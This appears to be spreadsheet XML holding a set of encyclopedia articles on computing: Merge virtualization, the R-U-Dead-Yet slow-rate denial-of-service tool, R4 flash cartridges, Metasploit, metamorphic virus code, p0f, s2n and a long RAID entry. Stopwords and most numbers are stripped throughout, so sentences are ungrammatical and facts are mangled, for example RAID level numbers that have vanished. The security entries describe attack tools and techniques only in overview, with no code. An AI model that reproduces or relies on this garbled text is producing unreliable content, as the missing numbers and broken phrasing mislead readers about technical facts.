    <t>merge software system allows user dos/windows unix, 8086 virtual machine. history merge originally developed unix system release at&amp;t 6300 plus personal computer. development virtual machine began late 1984, at&amp;t announced availability machine october 1985, referring bundled merge software simultask. (the 6300 plus shipped ms-dos 1985 though, unix system distribution ready march 1986.) merge developed engineers locus computing corporation, collaboration at&amp;t hardware software engineers, particularly aspects system specific 6300 plus contrast standard pc/at). at&amp;t 6300 plus contained intel 80286 processor, include support 8086 virtual machines (virtual 8086 mode) found 80386 later processors family. 80286, program realmode. 6300 plus designed special hardware would suppress capture cycles program directed toward addresses assigned direct access virtual machine. various system registers, programmable interrupt controller (pic), video controller, emulated software process, watchdog timer implemented recover programs would clear interrupt flag hang long. hardware used non-maskable interrupt (nmi) take control back emulation code.later, merge enhanced make virtual 8086 mode provided 80386 processor; version offered microport svr3 starting 1987, subsequently unix. there also merge/286 version unmodified pc/at (without special trapping hardware); long program reasonably well-behaved, though malicious crashing program could take unprotected unix kernel machines. even notoriously ill-behaved microsoft flight simulator would pc/at simultaneously unix. these later versions marketed directly locus well channels. product-evaluation version user manual appeared january 1987, retail version merge/386 shipping october year. late 1980s, main commercial competitor merge vp/ix developed interactive systems corporation phoenix technologies. at&amp;t's simultask based vp/ix.in 1992, univel unixware personal edition came merge novell's 6.0. locus eventually joined microsoft wise program gave access microsoft windows source code, allowed later versions merge windows shrink wrapped applications without copy windows.on april 1995, platinum technology announced agreement principle acquire locus computing corporation approximately us$33 million, attributed merge technology product. acquisition went through, platinum went develop merge version windows support, released 1998.the merge technology bought company called dascom 1999, turn bought ibm. company called trelos spun 2000 continued development virtual machine software created win4lin. trelos later merged netraverse, inc. group distributes netraverse merge 5.3, supports current products openserver unixware also popek goldberg virtualization requirements (dr. popek founders locus) windows interface source environment (wise) references external links "mergepro openserver unixware". o'gara, maureen (2003-12-20). "can save linux great satan sco?". computerworld zealand. communications. issn 0113-1494. cmpwnz. archived original 2016-03-03.</t>
  </si>
  <si>
    <t>R-U-Dead-Yet</t>
  </si>
  <si>
    <t>r.u.d.y., short dead yet, acronym used describe denial service (dos) tool used hackers perform slow-rate a.k.a. “low slow” attacks directing long form fields targeted server. known interactive console, thus making user-friendly tool. opens fewer connections website targeted long period keeps sessions open long feasible. amount open sessions overtires server website making unavailable authentic visitors. data sent small packs incredibly slow rate; normally seconds byte intervals definite vary avert detection. victim servers types attacks face issues able access particular website, disrupt connection, drastically slow network performance, etc. hackers attacks different purposes targeting different servers hosts; purposes include, limited blackmail, vengeance sometimes even activism. rudy attack opens concurrent post http connections http server delays sending body post request point server resources saturated. this attack sends numerous small packets slow rate keep connection open server busy. this low-and slow attack behavior makes relatively difficult detect, compared flooding attacks raise traffic volume abnormally. also fork bomb high orbit cannon land ping death redos slowloris zemra references external links r-u-dead-yet google code r-u-dead-yet sourceforge</t>
  </si>
  <si>
    <t>MeshBox</t>
  </si>
  <si>
    <t>meshbox item computer hardware used provide large scale wireless broadband networks. manufactured locustworld, devices designed co-operate meshboxes within range, passing internet service next, air, reaches final destination. coverage area mesh typically measured square miles square kilometres. originally released bootable cd-rom called meshap based openap open source software, system implemented system image within small 32mb compactflash card. system functions expanded beyond creating wireless networks provide set-top services, audio video streaming, connection remote windows terminal servers, pcs, browsing, connection peer-to-peer networks, instant messaging file exchange. also wireless mesh network wireless wireless access point wireless community network ieee 802.11 external links communitywireless.org wireless internet assigned numbers authority</t>
  </si>
  <si>
    <t>SANDstorm hash</t>
  </si>
  <si>
    <t>sandstorm hash cryptographic hash function designed 2008 mark torgerson, richard schroeppel, draelos, nathan dautenhahn, sean malone, andrea walker, michael collins, hilarie orman nist sha-3 competition. sandstorm hash accepted first round nist hash function competition, accepted second round. architecture hash function explicit schedule. uses 8-bit 8-bit s-box. hash function parallelized large range platforms using multi-core processing.both sandstorm-256 sandstorm-512 twice slowly sha-2 measured cpb.as 2009, collision attack preimage attack sandstorm known better trivial birthday attack long second preimage attack. references external links sandstorm algorithm specification sandstorm submission package</t>
  </si>
  <si>
    <t>R4 cartridge</t>
  </si>
  <si>
    <t>(also known revolution flash cartridge nintendo handheld system. allows roms homebrew booted nintendo handheld system microsd card. this allows user homebrew applications, store multiple games single memory card, play games backed user. flashcard's original developer stopped production, however, popularity original many nintendo flashcards using name despite lack connection original. some cartridges also store boot image; turn made boot cartridge undocumented button combination recognized system's bootloader. since 3ds's secure boot signature validation broken, provides useful means installing custom firmware 3ds. original cards original cards microsd (≤2gb) card firmware games, support sdhc microsd cards. original revolution card longer sold, however cards commonly referred clones still purchased online. these flashcards exactly hardware are, intents purposes, also referred original revolution. notable clones popularity original cartridge subsequent continued popularity cards using name, nintendo flashcards using names still common despite original long since stopped production. these flashcards, referred clones, commonly words names denote features sdhc supports sdhc microsd cards, real time save support, often paired changing works nintendo consoles. also common clone cartridges include words gold, plus, ultra, dual-core serve make card sound impressive. gold plus (r4ids.cn) gold plus r4ids.cn notable featuring switch inside cartridge allows easily switching normal nintendods flashcard mode allows used ntrboot exploit nintendo 3ds. this unique feature, combined high compatibility support rts, made formerly highly recommended card, however final production defective unable play nintendo roms. r4isdhc.com r4isdhc.com produced many clones, typically going names "r4isdhc gold", "r4isdhc lite", "r4isdhc dual-core". despite different names cards website exactly internally, differing cartridge color label. cards branded r4isdhc.com also labelled specific year time bomb card refuses load nintendo roms certain date. this time bomb enforced software, however, bypassed easily. ace3ds+ ace3ds+ carts boards clones carts, cart often gets confused predecessor ace3ds dstt clone. ace3ds+ infamous cloned carts modern clone cards running ace3ds+ based software. infamous carts ace3ds+ based codes carts include often pirated games currently sold online shops like ebay amazon legal issues flash cartridges banned countries copyright infringement lawsuits nintendo. late 2007, nintendo began legal crackdown series raids merchants. united kingdom 2010, company playables limited, importers flashcards, ruled london high court. ruling outlawed sales, importation, advertising flashcards. defence playables limited claimed flashcards legal uses homebrew application. however, bypassing nintendo's security system united kingdom. after news broke, nintendo released statement saying support game developers create applications legitimately. 100,000 copying devices including seized 2009. nintendo claimed cards seized benefit company, benefit 1400 video game companies depend sales games. france october 2011, cards banned france. while nintendo's original lawsuit dismissed basis devices could used make homebrews develop software 2009, 2011 ruling reversed this, paris court appeals ruled five sellers distributors. sellers distributors fined €460,000, sentenced jail. stephan bole, managing director nintendo france released statement saying "nintendo supported criminal action company’s sake, interests game developer partners spend time money legitimately developing software nintendo’s game platforms, customers expect highest standards integrity products bearing nintendo name." japan 2009, government japan outlawed sales flashcard. 2012, japanese ministry economy, trade, industry revealed importing cards, similar devices, punishable law. 2013, nintendo court case card distributors japan. tokyo district court ruled sellers cards owed nintendo video game developers ¥95,625,000. germany 2009, nintendo lost lawsuit seller flashcards, however nintendo second final instance. since december 2014, flashcards officially illegal germany's copyright law. seller distributor flashcards fined million. italy 2009, nintendo started lawsuit seller flashcards, lasted three instances ended 2017 sentence seller, however punishment undisclosed. curiously, another trial held 2016 court catania declared flashcards legal since exchanged microsd-to-dscart adapters, citing fact able copyrighted code without kernel, sold flashcard, hardware-embedded protection breaking functionalities considerate legitimate unsigned code. other countries other countries banned flashcards include australia, belgium, netherlands, south korea. also nintendo storage devices references</t>
  </si>
  <si>
    <t>RAID levels</t>
  </si>
  <si>
    <t>raid level possible configurations raid disk array. raid stands redundant array independent disks (or, formerly, redundant array inexpensive disks). raid levels refer standard raid levels, raid configurations defined common raid disk drive format standard, maintained storage networking industry association nested raid levels, raid configurations incorporate features standard raid levels non-standard raid levels, variants standard nested raid levels. non-standard raid levels deviate standard configurations defined storage networking industry association (snia). also non-raid drive architectures</t>
  </si>
  <si>
    <t>PC1 cipher</t>
  </si>
  <si>
    <t>amazon kindle e-book reader system uses cipher, also called kindle cipher pukall cipher history cipher designed alexander pukall 1991. references external links encryption algorithm encryption algorithm</t>
  </si>
  <si>
    <t>PA Server Monitor</t>
  </si>
  <si>
    <t>server monitor server network monitoring software power admin llc. server monitor focuses primarily server network health numerous resource checks, reports, alerting options. agentless, on-premises software monitor thousands devices single installation. monitored devices desktop computers, servers, routers devices. main function software monitor performance servers network devices windows linux environments. data kept customers servers, stored cloud. agentless monitoring software watch ping, cpu, memory, disk, snmp traps, events, available historical reports. apps available android. history power admin privately held company founded professionals, located shawnee, kansas, outside downtown kansas city, missouri area. power admin providing professional grade system monitoring products since 1992 types business smbs fortune companies. power admin also developed popular utilities used world. paexec allows user launch windows programs remote windows computers without needing install software remote computer first. this written alternative microsoft's psexec tool (originally sysinternals's mark russinovich), could redistributed, sensitive command-line options like username passwords sent clear text. source code readily available github.power admin also developed speedfanhttpagent. speedfan http agent exports allows access speedfan's (utility alfredo milani comparetti) temperature data across network simple http request. what does server monitor monitors event logs, disk space, running services, page content, snmp object values, files, processes, ping response time, directory quotas, changed files directories. equipped monitor thousands servers/devices single installation, satellite monitoring services. extensive reporting status reports servers/devices, group summaries, uptime historic stats, providing actions alerts customizable email, types notifications, suppression escalation certain notifications. also automatically restart services custom scripts. other capabilities include satellite monitoring remote offices/locations across firewalls and/or across internet without vpn, agentless server monitoring bulk config feature speed changes across many servers/devices. alerts server monitor event suppression false alerts, event deduplication system remove noise, event escalation give alerts increasing visibility problem persists longer. alert reminders also used make sure problems forgotten about. device support server monitor windows-based, many monitors standard microsoft windows apis (mostly based microsoft rpc). standard protocols snmp (including traps), syslog, ipmi, https, ftp, various mail protocols, ssh, etc. allows monitoring non-windows devices. architecture server monitor made three main components: central service, console optional satellite monitoring services. because product agentless, nothing gets installed monitored devices. addition, since software installed on-premises, data remains on-premises. central service central service software. this database stored historical reporting trend analysis, alerts sent from, configuration kept. central service contains server interface reports viewed. console console application native windows application, "single pane glass" configuration, monitoring reporting done. console installed multiple workstations, connect central service https-based api. satellite monitoring service satellite monitoring service enables remote distributed monitoring. optional monitoring engine (only available ultra license) monitoring central service this installed network central service distribute monitoring load, installed remote sites monitoring devices central service access. even remote site case, configuration continues done console application. satellite monitoring service also connects central service https-based api. automatic failover optional second central monitoring server installed keep track status main central monitoring server fail, failover automatically take monitoring duties. satellite monitoring services automatically switch newly active failover server period. monitors monitors basic function contains reference resource monitored, well thresholds compare against, list actions (alerts) fire problems. monitors several attributes make easier conform various environments. version history v.8.4 (2022) v.8.3 (2021) v.8.2 (2020) v.8.0 (2019) v.7.2 (2018) v.7.0 (2017) v.6.3 (2016) v.6.0 (2015) v.5.6 (2014) v.5.2 (2012) v.4.0 (2011) v.3.7 (2009) v.3.6 (2008) v.3.4 (2007) v.3.3 (2006) v.2.2 (2005) v.2.0 (2004) v.1.0 (first beta release (2004)) also comparison network monitoring systems computer performance remote administration application performance management website monitoring network management system monitor cowart, robert; knittel, brian (2008). special edition: using microsoft windows vista (second ed.). publishing. isbn 0-7897-3781-7. references external links official website server monitor file sight storage monitor blog network wrangler</t>
  </si>
  <si>
    <t>P0f</t>
  </si>
  <si>
    <t>passive tcp/ip stack fingerprinting tool. attempt identify system running machines send network traffic running machine shares medium machine running also assist analysing aspects remote system. overview inspecting network traffic passively, attempt identify operating systems remote machines send packets detecting machine's network interface, physical subnet detecting machine listen since version also able deduce aspects remote system inspecting application-level http messages.p0f also check firewall presence. estimate distance remote system calculate uptime. also guesses remote system's means connecting network (dsl, oc3, etc.).unlike tools like nmap, generate traffic. instead, determines operating system remote host analyzing certain fields captured packets. this benefits environments actively creating network traffic would cause unhelpful side effects. particular, remote system able detect packet capture inspection. usage signatures used packet inspection stored simple text file. this allows modified without recompiling p0f. user allowed different fingerprinting file selecting another time. graphical user interface: command line prompt. references external links official website</t>
  </si>
  <si>
    <t>Metamorphic code</t>
  </si>
  <si>
    <t>metamorphic code code outputs logically equivalent version code interpretation. this similar quine, except quine's source code exactly equivalent output. metamorphic code also usually outputs machine code source code. overview metamorphic code used computer viruses avoid pattern recognition anti-virus software. metamorphic viruses often translate binary code temporary representation, editing temporary representation translate edited form back machine code again. this procedure done virus itself, thus also metamorphic engine undergoes changes, means part virus stays same. this differs polymorphic code, polymorphic engine rewrite code. metamorphic code used viruses infect files, result next generation never look like current generation. mutated code exactly thing (under interpretation used), child's binary representation typically completely different parent's. mutation achieved using techniques like inserting instructions (brute force), changing registers use, changing flow control jumps, changing machine instructions equivalent ones reordering independent instructions. metamorphism protect virus heuristic analysis.metamorphic code also mean virus capable infecting executables different operating systems (such windows linux) even different computer architectures. often, virus carrying several viruses within itself. beginning virus coded translates correct machine-code platforms supposed execute this used primarily remote exploit injection code target platform unknown. metamorphic viruses simile zmist lacrimae also self-modifying code strange loop polymorphic code timeline notable computer viruses worms references external links hunting metamorphic</t>
  </si>
  <si>
    <t>Metasploit Project</t>
  </si>
  <si>
    <t>metasploit project computer security project provides information security vulnerabilities aids penetration testing signature development. owned boston, massachusetts-based security company rapid7. best-known sub-project open-source metasploit framework, tool developing executing exploit code remote target machine. other important sub-projects include opcode database, shellcode archive related research. metasploit project includes anti-forensic evasion tools, built metasploit framework. metasploit pre-installed kali linux operating system. history metasploit created moore 2003 portable network tool using perl. 2007, metasploit framework completely rewritten ruby. october 2009, metasploit project announced acquired rapid7, security company provides unified vulnerability management solutions. like comparable commercial products immunity's canvas core security technologies' core impact, metasploit used test vulnerability computer systems break remote systems. like many information security tools, metasploit used legitimate unauthorized activities. since acquisition metasploit framework, rapid7 added open core proprietary editions called metasploit express metasploit pro. metasploit's emerging position facto exploit development framework release software vulnerability advisories often accompanied third party metasploit exploit module highlights exploitability, risk remediation particular bug. metasploit began include fuzzing tools, used discover software vulnerabilities, rather exploits known bugs. this avenue seen integration lorcon wireless (802.11) toolset metasploit november 2006. metasploit framework basic steps exploiting system using framework include. optionally checking whether intended target system vulnerable exploit. choosing configuring exploit (code enters target system taking advantage bugs; different exploits windows, unix/linux macos systems included). choosing configuring payload (code executed target system upon successful entry; instance, remote shell server). metasploit often recommends payload work. choosing encoding technique hexadecimal opcodes known "bad characters" removed payload, characters cause exploit fail. executing exploit.this modular approach allowing combination exploit payload major advantage framework. facilitates tasks attackers, exploit writers payload writers. metasploit runs unix (including linux macos) windows. metasploit framework extended add-ons multiple languages. choose exploit payload, information target system needed, operating system version installed network services. this information gleaned port scanning tcp/ip stack fingerprinting tools nmap. vulnerability scanners nessus, openvas detect target system vulnerabilities. metasploit import vulnerability scanner data compare identified vulnerabilities existing exploit modules accurate exploitation. metasploit interfaces there several interfaces metasploit available. popular maintained rapid7 strategic cyber llc. metasploit framework edition free version. contains command line interface, third-party import, manual exploitation manual brute forcing. this free version metasploit project also includes zenmap, well known security scanner, compiler ruby, language version metasploit written. metasploit october 2010, rapid7 added metasploit pro, open-core commercial metasploit edition penetration testers. metasploit adds onto metasploit express features quick start wizards/metamodules, building managing social engineering campaigns, application testing, advanced console, dynamic payloads anti-virus evasion, integration nexpose ad-hoc vulnerability scans, pivoting. discontinued editions metasploit metasploit community edition july 2019, rapid7 announced end-of-sale metasploit community edition. existing users able continue using license expired. edition released october 2011, included free, web-based user interface metasploit. metasploit community edition based commercial functionality paid-for editions reduced features, including network discovery, module browsing manual exploitation. metasploit community included main installer. metasploit express edition june 2019, rapid7 discontinued metasploit express edition.the edition released april 2010, open-core commercial edition security teams need verify vulnerabilities. offers graphical user interface, integrated nmap discovery, added smart brute-forcing well automated evidence collection. armitage armitage graphical cyber attack management tool metasploit project visualizes targets recommends exploits. free open source network security tool notable contributions team collaboration allowing shared sessions, data, communication single metasploit instance.armitage latest release 2015. cobalt strike cobalt strike collection threat emulation tools provided helpsystems work metasploit framework. cobalt strike includes features armitage adds post-exploitation tools, addition report generation features. exploits metasploit currently 2074 exploits, organized following platforms: aix, android, bsd, bsdi, cisco, firefox, freebsd, hp-ux, irix, java, javascript, linux, mainframe, multi (applicable multiple platforms), netbsd, netware, nodejs, openbsd, macos, php, python, ruby, solaris, unix, windows. payloads metasploit currently payloads. some are: command shell enables users collection scripts arbitrary commands host. meterpreter (the metasploit interpreter) enables users control screen device using browse, upload download files. dynamic payloads enable users evade anti-virus defense generating unique payloads. static payloads enable static address/port forwarding communication host client system. auxiliary modules metasploit framework includes hundreds auxiliary modules perform scanning, fuzzing, sniffing, much more. there three types auxiliary modules namely scanners, admin server modules. contributors metasploit framework operates open-source project accepts contributions community github.com pull requests. submissions reviewed team consisting rapid7 employees senior external contributors. majority contributions modules, exploits scanners.list original developers: moore (founder chief architect) matt miller (core developer 2004–2008) spoonm (core developer 2003–2008) also w3af owasp open application security project references further reading powerful payloads: evolution exploit frameworks, searchsecurity.com, 2005-10-20 chapter writing exploits sockets, shellcode, porting coding: reverse engineering exploits tool coding security professionals james foster (isbn 1-59749-005-9). written vincent liu, chapter explains metasploit develop buffer overflow exploit scratch. external links official website</t>
  </si>
  <si>
    <t>S2n</t>
  </si>
  <si>
    <t>open-source implementation transport layer security (tls) protocol developed amazon services (aws) released 2015. developed ensure code—about 6,000 lines long—would easier review openssl—with 500,000 lines, 70,000 involved processing tls. history released june 2015 github. said name "s2n" stand signal noise almost magical encryption—disguising meaningful signals, like critical data, seemingly random noise". subject several external reviews well penetration testing.it reportedly vulnerable lucky thirteen attack. response, amazon's team said would remove cbc-mode cipher suites take code boringssl replace cbc-mode decryption. security blog post said impact amazon, aws, customers never used production environment.in february 2017, amazon announced handling 100% traffic amazon features extensions common extensions supported software server name indication, application-layer protocol negotiation, online certificate status protocol. cryptography supports main ciphers today, modes, 3des rc4. also provides support perfect forward secrecy diffie–hellman elliptic-curve diffie–hellman ephemeral keys. weaker ciphers exchange modes disabled default. language bindings language bindings developed aws: lua: luajit binding python: cys2n references</t>
  </si>
  <si>
    <t>RAID</t>
  </si>
  <si>
    <t>raid "redundant array inexpensive disks" "redundant array independent disks") data storage virtualization technology combines multiple physical disk drive components logical units purposes data redundancy, performance improvement, both. this contrast previous concept highly reliable mainframe disk drives referred "single large expensive disk" (sled).data distributed across drives several ways, referred raid levels, depending required level redundancy performance. different schemes, data distribution layouts, named word "raid" followed number, example raid raid each scheme, raid level, provides different balance among goals: reliability, availability, performance, capacity. raid levels greater raid provide protection unrecoverable sector read errors, well failures whole physical drives. history term "raid" invented david patterson, garth gibson, randy katz university california, berkeley 1987. june 1988 paper case redundant arrays inexpensive disks (raid)", presented sigmod conference, argued top-performing mainframe disk drives time could beaten performance array inexpensive drives developed growing personal computer market. although failures would rise proportion number drives, configuring redundancy, reliability array could exceed large single drive.although using terminology, technologies five levels raid named june 1988 paper used various products prior paper's publication, including following: mirroring (raid well established 1970s including, example, tandem nonstop systems. 1977, norman ouchi filed patent disclosing subsequently named raid around 1983, began shipping subsystem mirrored ra8x disk drives (now known raid part hsc50 subsystem. 1986, clark filed patent disclosing subsequently named raid around 1988, thinking machines' datavault used error correction codes (now known raid array disk drives. similar approach used early 1960s 353.industry manufacturers later redefined raid acronym stand "redundant array independent disks". overview many raid levels employ error protection scheme called "parity", widely used method information technology provide fault tolerance given data. most simple xor, raid uses separate parities based respectively addition multiplication particular galois field reed–solomon error correction.raid also provide data security solid-state drives (ssds) without expense all-ssd system. example, fast mirrored mechanical drive. configuration provide significant speed advantage, appropriate controller needed uses fast read operations. adaptec calls "hybrid raid". standard levels originally, five standard levels raid, many variations evolved, including several nested levels many non-standard levels (mostly proprietary). raid levels associated data formats standardized storage networking industry association (snia) common raid disk drive format (ddf) standard: raid consists striping, mirroring parity. compared spanned volume, capacity raid volume same; capacities drives set. striping distributes contents file among drives set, failure drive causes entire raid volume files lost. comparison, spanned volume preserves files unfailing drives. benefit raid throughput read write operations file multiplied number drives because, unlike spanned volumes, reads writes done concurrently. cost increased vulnerability drive failures—since drive raid setup failing causes entire volume lost, average failure rate volume rises number attached drives. raid consists data mirroring, without parity striping. data written identically drives, thereby producing "mirrored set" drives. thus, read request serviced drive set. request broadcast every drive set, serviced drive accesses data first (depending seek time rotational latency), improving performance. sustained read throughput, controller software optimized approaches throughputs every drive set, raid actual read throughput raid implementations slower fastest drive. write throughput always slower every drive must updated, slowest drive limits write performance. array continues operate long least drive functioning. raid consists bit-level striping dedicated hamming-code parity. disk spindle rotation synchronized data striped sequential different drive. hamming-code parity calculated across corresponding bits stored least parity drive. this level historical significance only; although used early machines (for example, thinking machines cm-2), 2014 used commercially available system. raid consists byte-level striping dedicated parity. disk spindle rotation synchronized data striped sequential byte different drive. parity calculated across corresponding bytes stored dedicated parity drive. although implementations exist, raid commonly used practice. raid consists block-level striping dedicated parity. this level previously used netapp, largely replaced proprietary implementation raid parity disks, called raid-dp. main advantage raid raid parallelism: raid single read operation requires reading whole group data drives, raid read operation spread across data drives. result, operations executed parallel, improving performance small transfers. raid consists block-level striping distributed parity. unlike raid parity information distributed among drives, requiring drives present operate. upon failure single drive, subsequent reads calculated distributed parity data lost. raid requires least three disks. like single-parity concepts, large raid implementations susceptible system failures trends regarding array rebuild time chance drive failure rebuild (see "increasing rebuild time failure probability" section, below). rebuilding array requires reading data disks, opening chance second drive failure loss entire array. raid consists block-level striping double distributed parity. double parity provides fault tolerance failed drives. this makes larger raid groups practical, especially high-availability systems, large-capacity drives take longer restore. raid requires minimum four disks. raid single drive failure results reduced performance entire array failed drive replaced. with raid array, using drives multiple sources manufacturers, possible mitigate problems associated raid larger drive capacities larger array size, important becomes choose raid instead raid raid also minimizes problems. nested (hybrid) raid originally termed hybrid raid, many storage controllers allow raid levels nested. elements raid either individual drives arrays themselves. arrays rarely nested level deep. final array known array. when array raid (such raid raid 5+0), vendors omit (yielding raid raid respectively). raid 0+1: creates stripes mirrors them. single drive failure occurs mirrors failed, point running effectively raid redundancy. significantly higher risk introduced rebuild raid data drives remaining stripe read rather drive, increasing chance unrecoverable read error (ure) significantly extending rebuild window. raid 1+0: (see: raid creates striped series mirrored drives. array sustain multiple drive losses long mirror loses drives. jbod raid n+n: with jbod (just bunch disks), possible concatenate disks, also volumes raid sets. with larger drive capacities, write delay rebuilding time increase dramatically (especially, described above, raid raid splitting larger raid smaller subsets concatenating linear jbod, write rebuilding time reduced. hardware raid controller capable nesting linear jbod raid linear jbod achieved os-level software raid combination separate raid subset volumes created within one, more, hardware raid controller(s). besides drastic speed increase, also provides substantial advantage: possibility start linear jbod small disks able expand total disks different size, later time, disks bigger size become available market). there another advantage form disaster recovery raid subset happens fail, data raid subsets lost, reducing restore time). non-standard levels many configurations basic numbered raid levels possible, many companies, organizations, groups created non-standard configurations, many cases designed meet specialized needs small niche group. such configurations include following: linux raid provides general raid driver "near" layout defaults standard raid drives, standard raid four drives; however, include number drives, including numbers. with "far" layout, raid striped mirrored, even drives layout; runs mirroring striped reads, giving read performance raid regular raid provided linux software raid, stripe reads, perform reads parallel. hadoop raid system generates parity file xor-ing stripe blocks single hdfs file. beegfs, parallel file system, internal striping (comparable file-based raid0) replication (comparable file-based raid10) options aggregate throughput capacity multiple servers typically based underlying raid make disk failures transparent. declustered raid scatters dual more) copies data across disks (possibly hundreds) storage subsystem, holding back enough spare capacity allow disks fail. scattering based algorithms give appearance arbitrariness. when disks fail missing copies rebuilt spare capacity, arbitrarily. because rebuild done remaining disks, operates much faster traditional raid, reducing overall impact clients storage system. implementations distribution data across multiple drives managed either dedicated computer hardware software. software solution part operating system, part firmware drivers supplied standard drive controller (so-called "hardware-assisted software raid"), reside entirely within hardware raid controller. hardware-based configuration hardware raid hardware raid controllers configured card bios option operating system booted, operating system booted, proprietary configuration utilities available manufacturer controller. unlike network interface controllers ethernet, usually configured serviced entirely common operating system paradigms like ifconfig unix, without need third-party tools, manufacturer raid controller usually provides proprietary software tooling operating system deem support, ensuring vendor lock-in, contributing reliability issues.for example, freebsd, order access configuration adaptec raid controllers, users required enable linux compatibility layer, linux tooling adaptec, potentially compromising stability, reliability security setup, especially taking long-term view.some operating systems implemented generic frameworks interfacing raid controller, provide tools monitoring raid volume status, well facilitation drive identification blinking, alarm management spare disk designations within operating system without reboot card bios. example, approach taken openbsd 2005 bio(4) pseudo-device bioctl utility, provide volume status, allow led/alarm/hotspare control, well sensors (including drive sensor) health monitoring; approach subsequently adopted extended netbsd 2007 well. software-based software raid implementations provided many modern operating systems. software raid implemented layer abstracts multiple devices, thereby providing single virtual device (such linux kernel's openbsd's softraid) generic logical volume manager (provided server-class operating systems veritas lvm) component file system (such zfs, spectrum scale btrfs) layer sits file system provides parity protection user data (such raid-f)some advanced file systems designed organize data across multiple storage devices directly, without needing help third-party logical volume manager: supports equivalents raid raid raid (raid-z1) single-parity, raid (raid-z2) double-parity, triple-parity version (raid-z3) also referred raid always stripes top-level vdevs, supports equivalents 1+0, 5+0, nested raid levels well striped triple-parity sets) nested combinations. native file system solaris illumos, also available freebsd linux. open-source implementations actively developed openzfs umbrella project. spectrum scale, initially developed media streaming scalable analytics, supports declustered raid protection schemes n+3. particularity dynamic rebuilding priority runs impact background data chunk hits redundancy, case chunk quickly rebuilt least n+1. top, spectrum scale supports metro-distance raid btrfs supports raid raid raid (raid development). originally designed provide integrated volume manager supports concatenating, mirroring striping multiple physical storage devices. however, implementation linux kernel lacks integrated volume manager.many operating systems provide raid implementations, including following: hewlett-packard's openvms operating system supports raid mirrored disks, called "shadow set", different locations assist disaster recovery. apple's macos macos server support raid raid raid 1+0. freebsd supports raid raid raid raid nestings geom modules ccd. linux's supports raid raid raid raid raid nestings. certain reshaping/resizing/expanding operations also supported. microsoft windows supports raid raid raid using various software implementations. logical disk manager, introduced windows 2000, allows creation raid raid raid volumes using dynamic disks, limited professional server editions windows release windows windows modified unlock support raid windows windows server 2012 introduced raid-like feature known storage spaces, also allows users specify mirroring, parity, redundancy folder-by-folder basis. these options similar raid raid implemented higher abstraction level. netbsd supports raid software implementation, named raidframe. openbsd supports raid software implementation, named softraid.if boot drive fails, system sophisticated enough able boot remaining drive drives. instance, consider computer whose disk configured raid (mirrored drives); first drive array fails, first-stage boot loader might sophisticated enough attempt loading second-stage boot loader second drive fallback. second-stage boot loader freebsd capable loading kernel array. firmware- driver-based software-implemented raid always compatible system's boot process, generally impractical desktop versions windows. however, hardware raid controllers expensive proprietary. fill gap, inexpensive "raid controllers" introduced contain dedicated raid controller chip, simply standard drive controller chip proprietary firmware drivers. during early bootup, raid implemented firmware and, operating system completely loaded, drivers take control. consequently, controllers work driver support available host operating system. example intel rapid storage technology, implemented many consumer-level motherboards.because minimal hardware support involved, implementation also called "hardware-assisted software raid", "hybrid model" raid, even "fake raid". raid supported, hardware provide hardware accelerator. advantage model pure software raid that—if using redundancy mode—the boot drive protected failure (due firmware) boot process even operating system's drivers take over. integrity data scrubbing (referred environments patrol read) involves periodic reading checking raid controller blocks array, including otherwise accessed. this detects blocks use. data scrubbing checks blocks storage device array, also uses redundancy array recover blocks single drive reassign recovered data spare blocks elsewhere drive.frequently, raid controller configured "drop" component drive (that assume component drive failed) drive unresponsive eight seconds might cause array controller drop good drive drive given enough time complete internal error recovery procedure. consequently, using consumer-marketed drives raid risky, so-called "enterprise class" drives limit error recovery time reduce risk. western digital's desktop drives used specific fix. utility called wdtler.exe limited drive's error recovery time. utility enabled tler (time limited error recovery), limits error recovery time seven seconds. around september 2009, western digital disabled feature desktop drives (such caviar black line), making drives unsuitable raid configurations. however, western digital enterprise class drives shipped factory tler enabled. similar technologies used seagate, samsung, hitachi. non-raid usage, enterprise class drive short error recovery timeout cannot changed therefore less suitable desktop drive. late 2010, smartmontools program began supporting configuration error recovery control, allowing tool configure many desktop class hard drives raid setups.while raid protect physical drive failure, data still exposed operator, software, hardware, virus destruction. many studies cite operator fault common source malfunction, server operator replacing incorrect drive faulty raid, disabling system (even temporarily) process.an array overwhelmed catastrophic failure exceeds recovery capacity entire array risk physical damage fire, natural disaster, human forces, however backups stored site. array also vulnerable controller failure always possible migrate new, different controller without data loss. weaknesses correlated failures practice, drives often (with similar wear) subject environment. since many drive failures mechanical issues (which likely older drives), violates assumptions independent, identical rate failure amongst drives; failures fact statistically correlated. practice, chances second failure first recovered (causing data loss) higher chances random failures. study 100,000 drives, probability drives cluster failing within hour four times larger predicted exponential statistical distribution—which characterizes processes events occur continuously independently constant average rate. probability failures 10-hour period twice large predicted exponential distribution. unrecoverable read errors rebuild unrecoverable read errors (ure) present sector read failures, also known latent sector errors (lse). associated media assessment measure, unrecoverable error (ube) rate, typically guaranteed less 1015 enterprise-class drives (scsi, sata), less 1014 desktop-class drives (ide/ata/pata sata). increasing drive capacities large raid instances maximum error rates insufficient guarantee successful recovery, high likelihood error occurring remaining drives raid rebuild. when rebuilding, parity-based schemes raid particularly prone effects ures affect sector occur, also reconstructed blocks using sector parity computation.double-protection parity-based schemes, raid attempt address issue providing redundancy allows double-drive failures; downside, schemes suffer elevated write penalty—the number times storage medium must accessed single write operation. schemes duplicate (mirror) data drive-to-drive manner, raid raid lower risk ures using parity computation mirroring striped sets. data scrubbing, background process, used detect recover ures, effectively reducing risk happening raid rebuilds causing double-drive failures. recovery ures involves remapping affected underlying disk sectors, utilizing drive's sector remapping pool; case ures detected background scrubbing, data redundancy provided fully operational raid allows missing data reconstructed rewritten remapped sector. increasing rebuild time failure probability drive capacity grown much faster rate transfer speed, error rates fallen little comparison. therefore, larger-capacity drives take hours days rebuild, time drives fail undetected read errors surface. rebuild time also limited entire array still operation reduced capacity. given array redundant drive (which applies raid levels "classic" two-drive raid second drive failure would cause complete failure array. even though individual drives' mean time failure (mtbf) increased time, increase kept pace increased storage capacity drives. time rebuild array single drive failure, well chance second failure rebuild, increased time.some commentators declared raid "band aid" respect, kicks problem little road. however, according 2006 netapp study berriman al., chance failure decreases factor 3,800 (relative raid proper implementation raid even using commodity drives. nevertheless, currently observed technology trends remain unchanged, 2019 raid array chance failure raid counterpart 2010.mirroring schemes raid bounded recovery time require copy single failed drive, compared parity schemes raid require copy blocks drives array set. triple parity schemes, triple mirroring, suggested approach improve resilience additional drive failure large rebuild time. atomicity system crash interruption write operation result states parity inconsistent data non-atomicity write process, parity cannot used recovery case disk failure. this commonly termed raid write hole. raid write hole known data corruption issue older low-end raids, caused 